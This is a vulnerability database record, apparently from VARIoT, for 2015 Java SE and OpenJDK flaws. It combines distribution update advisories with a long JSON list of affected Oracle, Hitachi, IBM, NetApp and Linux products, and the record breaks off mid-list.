Multiple vulnerabilities were discovered in the OpenJDK JRE related to information disclosure. An attacker could exploit these to expose sensitive data over the network. (CVE-2015-4734, CVE-2015-4842, CVE-2015-4903)
Multiple vulnerabilities were discovered in the OpenJDK JRE related to availability. (CVE-2015-4803, CVE-2015-4893, CVE-2015-4911)
Update instructions:
The problem can be corrected by updating your system to the following package versions:
Ubuntu 12.04 LTS: icedtea-6-jre-cacao 6b37-1.13.9-1ubuntu0.12.04.1 icedtea-6-jre-jamvm 6b37-1.13.9-1ubuntu0.12.04.1 openjdk-6-jre 6b37-1.13.9-1ubuntu0.12.04.1 openjdk-6-jre-headless 6b37-1.13.9-1ubuntu0.12.04.1 openjdk-6-jre-lib 6b37-1.13.9-1ubuntu0.12.04.1 openjdk-6-jre-zero 6b37-1.13.9-1ubuntu0.12.04.1
This update uses a new upstream release, which includes additional bug fixes. 6) - i386, x86_64
- Further information about these flaws can be found on the IBM Java Security alerts page, listed in the References section. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iD8DBQFWUw7xXlSAg2UNWIIRAvfBAJ9sZ6SOY/wDqcbrO1vKXXL/EkC7JwCgsgGr gRqvLgc6fmY6yFpHYhxEqsE= =PM0f -----END PGP SIGNATURE-----
-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce .
For the oldstable distribution (wheezy), these problems have been fixed in version 7u85-2.6.1-6~deb7u1.
For the stable distribution (jessie), these problems have been fixed in version 7u85-2.6.1-5~deb8u1.
For the unstable distribution (sid), these problems have been fixed in version 7u85-2.6.1-5
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201510-0529", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "jrockit", "scope": "eq", "trust": 1.8, "vendor": "oracle", "version": "r28.3.7" }, { "model": "jdk", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "1.6.0" }, { "model": "jdk", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "1.7.0" }, { "model": "jre", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "1.7.0" }, { "model": "jre", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "1.6.0" }, { "model": "jre", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "1.8.0" }, { "model": "jdk", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "1.8.0" }, { "model": "jre update", "scope": "eq", "trust": 0.9, "vendor": "oracle", "version": "1.860" }, { "model": "jre update", "scope": "eq", "trust": 0.9, "vendor": "oracle", "version": "1.851" }, { "model": "jre update", "scope": "eq", "trust": 0.9, "vendor": "oracle", "version": "1.785" }, { "model": "jre update", "scope": "eq", "trust": 0.9, "vendor": "oracle", "version": "1.6101" }, { "model": "jdk update", "scope": "eq", "trust": 0.9, "vendor": "oracle", "version": "1.860" }, { "model": "jdk update", "scope": "eq", "trust": 0.9, "vendor": "oracle", "version": "1.851" }, { "model": "jdk update", "scope": "eq", "trust": 0.9, "vendor": "oracle", "version": "1.785" }, { "model": "jdk update", "scope": "eq", "trust": 0.9, "vendor": "oracle", "version": "1.6101" }, { "model": "ucosminexus service platform messaging )", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "-09-00" }, { "model": "ucosminexus service platform messaging", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "-07-00" }, { "model": "ucosminexus service platform )", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "09-00" }, { "model": "ucosminexus service platform", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "07-00" }, { "model": "ucosminexus service architect )", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "09-00" }, { "model": "ucosminexus service architect", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "07-00" }, { "model": "ucosminexus server standard-r )", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "09-00" }, { "model": "ucosminexus server standard-r", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "07-00" }, { "model": "ucosminexus primary server base )", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "09-00" }, { "model": "ucosminexus primary server base", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "07-00" }, { "model": "ucosminexus operator )", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "09-00" }, { "model": "ucosminexus operator", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "07-00" }, { "model": "ucosminexus developer professional for plug-in )", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "09-00" }, { "model": "ucosminexus developer professional for plug-in", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "07-00" }, { "model": "ucosminexus developer professional", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "07-00" }, { "model": "ucosminexus developer light )", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "09-00" }, { "model": "ucosminexus developer light", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "07-00" }, { "model": "ucosminexus developer )", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "0109-00" }, { "model": "ucosminexus developer", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "0107-00" }, { "model": "ucosminexus client for plug-in )", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "09-00" }, { "model": "ucosminexus client for plug-in", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "07-00" }, { "model": "ucosminexus client )", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "09-00" }, { "model": "ucosminexus client", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "07-00" }, { "model": "ucosminexus application server-r )", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "09-00" }, { "model": "ucosminexus application server-r", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "07-00" }, { "model": "ucosminexus application server standard-r", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "07-00" }, { "model": "ucosminexus application server standard", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "07-00" }, { "model": "ucosminexus application server smart edition", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "07-00" }, { "model": "ucosminexus application server light )", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "09-00" }, { "model": "ucosminexus application server light", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "07-00" }, { "model": "ucosminexus application server express", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "07-00" }, { "model": "ucosminexus application server enterprise", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "07-00" }, { "model": "jdk", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "6 update 101" }, { "model": "jdk", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "7 update 85" }, { "model": "jdk", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "8 update 60" }, { "model": "jre", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "6 update 101" }, { "model": "jre", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "7 update 85" }, { "model": "jre", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "8 update 60" }, { "model": "java se", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "embedded 8 update 51" }, { "model": "jdk", "scope": "lte", "trust": 0.8, "vendor": "sun microsystems", "version": "6 update 21" }, { "model": "jre", "scope": "lte", "trust": 0.8, "vendor": "sun microsystems", "version": "6 update 21" }, { "model": "cosminexus developer\u0027s kit for java", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "cosminexus xml processor", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "application server", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "application server for developers", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "developer\u0027s kit for java", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "ucosminexus application server", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "-r" }, { "model": "ucosminexus application server", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "express" }, { "model": "ucosminexus application server", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "light" }, { "model": "ucosminexus application server", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "standard-r" }, { "model": "ucosminexus application server enterprise", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "ucosminexus application server smart edition", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "ucosminexus application server standard", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "ucosminexus client", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "none" }, { "model": "ucosminexus client", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "for plug-in" }, { "model": "ucosminexus developer", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "01" }, { "model": "ucosminexus developer", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "professional" }, { "model": "ucosminexus developer", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "professional for plug-in" }, { "model": "ucosminexus developer light", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "ucosminexus developer standard", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "ucosminexus operator", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "ucosminexus primary server", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "base" }, { "model": "ucosminexus server", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "standard-r" }, { "model": "ucosminexus service architect", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "ucosminexus service platform", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "none" }, { "model": "ucosminexus service platform", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "- messaging" }, { "model": "ucosminexus service platform messaging", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "-09-70" }, { "model": "ucosminexus service platform messaging )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "-09-70" }, { "model": "ucosminexus service platform messaging", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "-09-00" }, { "model": "ucosminexus service platform messaging )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "-08-50" }, { "model": "ucosminexus service platform messaging", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "-08-00" }, { "model": "ucosminexus service platform messaging )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "-07-00" }, { "model": "ucosminexus service platform", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "09-70" }, { "model": "ucosminexus service platform )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "09-70" }, { "model": "ucosminexus service platform", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "09-00" }, { "model": "ucosminexus service platform )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "08-50" }, { "model": "ucosminexus service platform", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "08-00" }, { "model": "ucosminexus service platform )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "07-00" }, { "model": "ucosminexus service architect", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "09-70" }, { "model": "ucosminexus service architect )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "09-70" }, { "model": "ucosminexus service architect", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "09-00" }, { "model": "ucosminexus service architect )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "08-50" }, { "model": "ucosminexus service architect", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "08-00" }, { "model": "ucosminexus service architect )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "07-00" }, { "model": "ucosminexus server standard-r", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "09-70" }, { "model": "ucosminexus server standard-r )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "09-70" }, { "model": "ucosminexus server standard-r", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "09-00" }, { "model": "ucosminexus server standard-r )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "08-50" }, { "model": "ucosminexus server standard-r", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "08-00" }, { "model": "ucosminexus server standard-r )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "07-00" }, { "model": "ucosminexus primary server base", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "09-70" }, { "model": "ucosminexus primary server base )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "09-70" }, { "model": "ucosminexus primary server base", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "09-00" }, { "model": "ucosminexus primary server base )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "08-50" }, { "model": "ucosminexus primary server base", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "08-00" }, { "model": "ucosminexus primary server base )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "07-00" }, { "model": "ucosminexus operator", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "09-70" }, { "model": "ucosminexus operator )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "09-70" }, { "model": "ucosminexus operator", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "09-00" }, { "model": "ucosminexus operator )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "08-50" }, { "model": "ucosminexus operator", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "08-00" }, { "model": "ucosminexus operator )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "07-00" }, { "model": "ucosminexus developer standard )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "08-50" }, { "model": "ucosminexus developer standard", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "07-00" }, { "model": "ucosminexus developer professional for plug-in", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "09-70" }, { "model": "ucosminexus developer professional for plug-in )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "09-70" }, { "model": "ucosminexus developer professional for plug-in", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "09-00" }, { "model": "ucosminexus developer professional for plug-in )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "08-50" }, { "model": "ucosminexus developer professional for plug-in", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "08-00" }, { "model": "ucosminexus developer professional for plug-in )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "07-00" }, { "model": "ucosminexus developer professional )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "08-50" }, { "model": "ucosminexus developer light", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "09-70" }, { "model": "ucosminexus developer light )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "09-70" }, { "model": "ucosminexus developer light )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "08-50" }, { "model": "ucosminexus developer light", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "08-00" }, { "model": "ucosminexus developer light )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "07-00" }, { "model": "ucosminexus developer", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "0109-70" }, { "model": "ucosminexus developer )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "0109-70" }, { "model": "ucosminexus developer", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "0109-00" }, { "model": "ucosminexus developer )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "0108-50" }, { "model": "ucosminexus developer", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "0108-00" }, { "model": "ucosminexus developer )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "0107-00" }, { "model": "ucosminexus client for plug-in", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "09-70" }, { "model": "ucosminexus client for plug-in )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "09-70" }, { "model": "ucosminexus client for plug-in", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "09-00" }, { "model": "ucosminexus client for plug-in )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "08-50" }, { "model": "ucosminexus client for plug-in", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "08-00" }, { "model": "ucosminexus client for plug-in )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "07-00" }, { "model": "ucosminexus client )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "09-70" }, { "model": "ucosminexus client", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "09-00" }, { "model": "ucosminexus client )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "08-50" }, { "model": "ucosminexus client", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "08-00" }, { "model": "ucosminexus client )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "07-00" }, { "model": "ucosminexus application server-r", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "09-70" }, { "model": "ucosminexus application server-r )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "09-70" }, { "model": "ucosminexus application server-r", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "09-00" }, { "model": "ucosminexus application server-r )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "08-50" }, { "model": "ucosminexus application server-r", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "08-00" }, { "model": "ucosminexus application server-r )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "07-00" }, { "model": "ucosminexus application server standard-r", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "09-70" }, { "model": "ucosminexus application server standard-r )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "09-70" }, { "model": "ucosminexus application server standard-r", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "09-00" }, { "model": "ucosminexus application server standard-r )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "09-00" }, { "model": "ucosminexus application server standard-r )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "08-50" }, { "model": "ucosminexus application server standard-r", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "08-00" }, { "model": "ucosminexus application server standard-r )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "07-00" }, { "model": "ucosminexus application server standard )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "09-70" }, { "model": "ucosminexus application server standard", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "09-00" }, { "model": "ucosminexus application server standard )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "09-00" }, { "model": "ucosminexus application server standard", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "08-00" }, { "model": "ucosminexus application server smart edition", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "09-70" }, { "model": "ucosminexus application server smart edition )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "08-50" }, { "model": "ucosminexus application server smart edition", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "08-00" }, { "model": "ucosminexus application server light", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "09-70" }, { "model": "ucosminexus application server light )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "09-70" }, { "model": "ucosminexus application server light", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "09-00" }, { "model": "ucosminexus application server light )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "08-50" }, { "model": "ucosminexus application server light", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "08-00" }, { "model": "ucosminexus application server light )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "07-00" }, { "model": "ucosminexus application server express )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "09-70" }, { "model": "ucosminexus application server express )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "09-00" }, { "model": "ucosminexus application server enterprise", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "09-00" }, { "model": "ucosminexus application server enterprise )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "09-00" }, { "model": "ucosminexus application server enterprise )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "08-50" }, { "model": "ucosminexus application server enterprise", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "08-00" }, { "model": "ucosminexus application server enterprise )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "07-00" }, { "model": "application server for developers )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "10-10" }, { "model": "application server for developers", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "10-00" }, { "model": "application server for developers )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "10-00" }, { "model": "application server", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "10-10" }, { "model": "application server )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "10-10" }, { "model": "application server", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "10-00" }, { "model": "application server )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "10-00" }, { "model": "linux lts i386", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "12.04" }, { "model": "linux lts amd64", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "12.04" }, { "model": "linux enterprise server sp4 ltss", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "10" }, { "model": "linux enterprise software development kit", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "12" }, { "model": "linux enterprise server", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "12" }, { "model": "linux enterprise module for legacy software", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "12" }, { "model": "opensuse", "scope": "eq", "trust": 0.3, "vendor": "s u s e", "version": "13.2" }, { "model": "opensuse", "scope": "eq", "trust": 0.3, "vendor": "s u s e", "version": "13.1" }, { "model": "enterprise linux workstation supplementary", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "enterprise linux workstation supplementary", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "enterprise linux supplementary server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5" }, { "model": "enterprise linux supplementary", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5" }, { "model": "enterprise linux server supplementary eus", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6.7" }, { "model": "enterprise linux server supplementary", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "enterprise linux server supplementary", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "enterprise linux hpc node supplementary", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "enterprise linux hpc node supplementary", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "enterprise linux desktop supplementary", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "enterprise linux desktop supplementary", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "enterprise linux desktop supplementary client", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5" }, { "model": "enterprise linux desktop supplementary", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5" }, { "model": "enterprise linux desktop client", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5" }, { "model": "enterprise linux server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "0" }, { "model": "jrockit r28.3.7", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "7" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.2" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5" }, { "model": "virtual storage console for vmware vsphere", "scope": "eq", "trust": 0.3, "vendor": "netapp", "version": "0" }, { "model": "snapmanager for oracle", "scope": "eq", "trust": 0.3, "vendor": "netapp", "version": "0" }, { "model": "oncommand workflow automation", "scope": "eq", "trust": 0.3, "vendor": "netapp", "version": "0" }, { "model": "oncommand unified manager host package", "scope": "eq", "trust": 0.3, "vendor": "netapp", "version": "0" }, { "model": "oncommand unified manager for clustered data ontap", "scope": "eq", "trust": 0.3, "vendor": "netapp", "version": "6.0" }, { "model": "oncommand report", "scope": "eq", "trust": 0.3, "vendor": "netapp", "version": "0" }, { "model": "oncommand insight", "scope": "eq", "trust": 0.3, "vendor": "netapp", "version": "0" }, { "model": "oncommand cloud manager", "scope": "eq", "trust": 0.3, "vendor": "netapp", "version": "0" }, { "model": "vasa provider for clustered data ontap", "scope": "eq", "trust": 0.3, "vendor": "netapp", "version": "0" }, { "model": "ef-series santricity storage manager", "scope": "eq", "trust": 0.3, "vendor": "netapp", "version": "0" }, { "model": "ef-series santricity management plug-ins", "scope": "eq", "trust": 0.3, "vendor": "netapp", "version": "0" }, { "model": "e-series santricity storage manager", "scope": "eq", "trust": 0.3, "vendor": "netapp", "version": "0" }, { "model": "e-series santricity management plug-ins", "scope": "eq", "trust": 0.3, "vendor": "netapp", "version": "0" }, { "model": "workflow for bluemix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "websphere service registry and repository studio", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "websphere service registry and repository studio", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "websphere service registry and repository studio", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5" }, { "model": "websphere service registry and repository studio", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "websphere real time", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0" }, { "model": "websphere real time sr9 fp10", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3" }, { "model": "websphere real time sr9", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3" }, { "model": "websphere real time sr8 fp10", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3" }, { "model": "websphere real time sr8", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3" }, { "model": "websphere real time sr7 fp1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3" }, { "model": "websphere real time sr7", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3" }, { "model": "websphere real time sr6", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3" }, { "model": "websphere real time sr5", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3" }, { "model": "websphere real time sr4-fp2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3" }, { "model": "websphere real time sr2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3" }, { "model": "websphere real time sr", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "39" }, { "model": "websphere real time sr fp", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3810" }, { "model": "websphere real time", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3" }, { "model": "websphere real time", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0" }, { "model": "websphere operational decision management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5" }, { "model": "websphere message broker toolkit", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8" }, { "model": "websphere message broker", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8" }, { "model": "websphere ilog jrules", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "websphere business events", "scope": "eq", "trust": 0.3, "vendor": "ibm", 